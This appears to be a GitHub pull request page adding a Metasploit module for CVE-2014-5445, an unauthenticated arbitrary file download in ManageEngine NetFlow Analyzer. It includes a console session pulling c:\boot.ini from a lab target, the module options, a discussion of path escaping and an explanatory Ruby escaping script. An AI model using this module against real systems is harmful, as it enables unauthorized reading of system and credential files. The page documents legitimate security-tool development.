
Add exploit for CVE-2014-5445, NetFlow Analyzer arbitrary download #4282

Merged
merged 4 commits into from Dec 12, 2014
Conversation

pedrib
Contributor

@pedrib pedrib commented Nov 30, 2014

This PR adds an exploit for CVE-2014-5445, a 0-day vulnerability in ManageEngine NetFlow Analyzer that allows an unauthenticated user to download any file in the system. This works on both Linux and Windows, and has been tested extensively with all vulnerable versions (8.6 to 10.2).

All that is left is to add the OSVDB ID and the full disclosure URL, and as usual those come up in 2 or 3 days max. I will push those when they come up, please have a look and let me know what you think.

@jvazquez-r7 jvazquez-r7 self-assigned this Dec 1, 2014
@jvazquez-r7
Contributor

Thanks @pedrib !! See pedrib#11 It's doing minor cleanup for #4282. Feel free to review and land once ready. I'll wait for you to add the OSVDB and FULLDISC url's and it will be ready to go!

Thanks!

Test after cleanup:

msf auxiliary(netflow_file_download) > reload
[*] Reloading module...
run
msf auxiliary(netflow_file_download) > run

[*] 172.16.158.138:8080 - Downloading file c:\boot.ini
[+] 172.16.158.138:8080 - File saved in: /Users/jvazquez/.msf4/loot/20141130185926_test_netflow_172.16.158.138_netflow.http_184735.ini
[*] Auxiliary module execution completed
msf auxiliary(netflow_file_download) > show options

Module options (auxiliary/admin/http/netflow_file_download):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILEPATH   c:\boot.ini      yes       Path of the file to download (escape Windows paths with 2 back slashes)
   Proxies                     no        Use a proxy chain
   RHOST      172.16.158.138   yes       The target address
   RPORT      8080             yes       The target port
   TARGETURI  /netflow         yes       The base path to NetFlow Analyzer
   VHOST                       no        HTTP server virtual host

msf auxiliary(netflow_file_download) > cat /Users/jvazquez/.msf4/loot/20141130185926_test_netflow_172.16.158.138_netflow.http_184735.ini
[*] exec: cat /Users/jvazquez/.msf4/loot/20141130185926_test_netflow_172.16.158.138_netflow.http_184735.ini

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
msf auxiliary(netflow_file_download) > loot

Loot
====

host            service  type          name         content                   info  path
----            -------  ----          ----         -------                   ----  ----
172.16.158.138           netflow.http  c:\boot.ini  application/octet-stream        /Users/jvazquez/.msf4/loot/20141130185926_test_netflow_172.16.158.138_netflow.http_184735.ini

msf auxiliary(netflow_file_download) >

@jvazquez-r7 jvazquez-r7 removed their assignment Dec 1, 2014
@pedrib
Contributor Author

pedrib commented Dec 1, 2014

Thanks, merged! I'll add the links as soon as they show up.

@todb-r7 todb-r7 changed the title Add exploit for CVE-2014-5445 Add exploit for CVE-2014-5445, NetFlow Analyzer arbitrary download Dec 1, 2014
@pedrib
Contributor Author

pedrib commented Dec 7, 2014

OSVDB and full disclosure links added, it's good to go!

@jvazquez-r7
Contributor

Thanks @pedrib , landing!

@jvazquez-r7 jvazquez-r7 merged commit 98e416f into rapid7:master Dec 12, 2014
jvazquez-r7 added a commit that referenced this pull request Dec 12, 2014
@todb-r7

todb-r7 commented Dec 18, 2014

@jvazquez-r7 @pedrib In your example here, you have:

FILEPATH   c:\boot.ini      yes       Path of the file to download (escape Windows paths with 2 back slashes)

Though I can't help but notice that you're not escaping the slashes here.

What should the user really be typing? C:\boot.ini or C:\\boot.ini or C:\\\boot.ini ?

@jhart-r7
Contributor

And I only just noticed this now, but C:\boot.ini isn't a safe default value, IMO, since boot.ini isn't present since Windows 7. C:\windows\system.ini is probably a better default.

@todb-r7

todb-r7 commented Dec 18, 2014

I'd be happy to have the default be system.ini and have the correct number of slashes. I just want to shorten that option description -- right now it's really long and already taken care of in the main description.

thx @jhart-r7

@pedrib
Contributor Author

pedrib commented Dec 18, 2014

@todb-r7 in a Linux prompt you have to type 4 back slashes filepath=C:\boot.ini, hence why in the original commit it said so and had such an example.

@todb
Contributor

todb commented Dec 18, 2014

Right, but now I'm confused what the user should be typing in the datastore option. The screen shot has no double slashes.

@pedrib
Contributor Author

pedrib commented Dec 18, 2014

I think - but correct me if I'm wrong - that two slashes are to escape in the shell and the other two backslashes for ruby.

@todb-r7

todb-r7 commented Dec 18, 2014

Okay. So if I'm in msfconsole, or an rc script, I need two slashes, and that's just for Ruby.

msf auxiliary(netflow_file_download) > set FILEPATH c:\\boot.ini
FILEPATH => c:\boot.ini

I was confused about the directive for two slashes because I read it as you'd need something like:

msf auxiliary(netflow_file_download) > set FILEPATH c:\\\\boot.ini
FILEPATH => c:\\boot.ini

I assume this is not what you intended.
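The two comments above (pedrib's "4 back slashes at a Linux prompt" and the `set FILEPATH c:\\boot.ini` => `c:\boot.ini` transcript) are both about how many escaping layers a Windows path passes through before it reaches the module's datastore. The following Ruby script is an added illustration written for this page; it is not code from the pull request or from Metasploit. It models each layer with Ruby's `Shellwords`, whose unquoted-backslash rules match POSIX sh word splitting, and it assumes (not stated on the page, but consistent with the transcript) that msfconsole tokenizes `set NAME VALUE` lines the same way. The helper names `win_path`, `posix_shell_layer`, `msfconsole_set`, `datastore_value` and `looks_like_windows_path?` are this example's own.

```ruby
require 'shellwords'

# Build a Windows path with exactly `n` backslashes between drive and file
# name, so there is no ambiguity about how many backslashes were "typed".
def win_path(n)
  'c:' + ('\\' * n) + 'boot.ini'
end

# Layer 1: an unquoted argument at a POSIX shell prompt (option passed on a
# command line before msfconsole ever sees it). An unquoted backslash escapes
# the next character, so each pair collapses to one. Shellwords implements
# those rules, so it stands in for the shell here; no real shell is invoked.
def posix_shell_layer(typed)
  Shellwords.split(typed).first
end

# Layer 2: the msfconsole prompt. ASSUMPTION: msfconsole tokenizes
# "set NAME VALUE" with Shellwords-style rules, which is what the thread's
# `set FILEPATH c:\\boot.ini` => `c:\boot.ini` result shows. Quoted values
# ('c:\boot.ini') are taken literally under these rules.
def msfconsole_set(line)
  cmd, name, *value = Shellwords.split(line)
  unless cmd == 'set' && name && !value.empty?
    raise ArgumentError, "expected 'set NAME VALUE', got #{line.inspect}"
  end
  [name, value.join(' ')]
end

# The value that lands in the datastore (and hence in the module's request)
# for a given keystroke sequence. `via_shell: true` models an option that
# first passes through a POSIX shell and only then reaches msfconsole.
def datastore_value(typed, via_shell: false)
  typed = posix_shell_layer(typed) if via_shell
  msfconsole_set("set FILEPATH #{typed}").last
end

# Pre-flight check: does the datastore value still look like an absolute
# Windows path with exactly one separator after the drive? A single backslash
# eaten by a layer leaves "c:boot.ini"; one layer too few leaves "c:\\boot.ini".
# Neither resolves to the intended file on the target.
def looks_like_windows_path?(value)
  value.match?(/\A[A-Za-z]:\\[^\\]/)
end

if __FILE__ == $PROGRAM_NAME
  cases = [
    [win_path(1), false],          # one backslash at msfconsole: eaten
    [win_path(2), false],          # two at msfconsole: correct
    [win_path(4), false],          # four at msfconsole: one too many
    [win_path(4), true],           # four at a POSIX shell, then msfconsole: correct
    ["'#{win_path(1)}'", false],   # single-quoted at msfconsole: taken literally
  ]
  cases.each do |typed, via_shell|
    got   = datastore_value(typed, via_shell: via_shell)
    where = via_shell ? 'shell -> msfconsole' : 'msfconsole'
    state = looks_like_windows_path?(got) ? 'OK' : 'BROKEN'
    puts format('typed %-18s at %-19s => datastore %-14s %s', typed, where, got, state)
  end
end
```

Run it with `ruby` and read the table: at the msfconsole prompt, two backslashes per separator (or a single-quoted path) produce the one-backslash value the module needs; four are only right when a POSIX shell consumes the first pair on the way in. Running `looks_like_windows_path?` on the datastore value before launching the module catches the eaten-backslash case, which otherwise fails quietly as a request for a path that does not exist.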

todb-r7 pushed a commit to todb-r7/metasploit-framework that referenced this pull request Dec 18, 2014
@todb-r7 todb-r7 mentioned this pull request Dec 18, 2014
@todb-r7

todb-r7 commented Dec 18, 2014

@pedrib feel free to comment on #4426 -- I think this is what you intended.

@pedrib pedrib deleted the netflow_file_dl branch February 1, 2017 00:39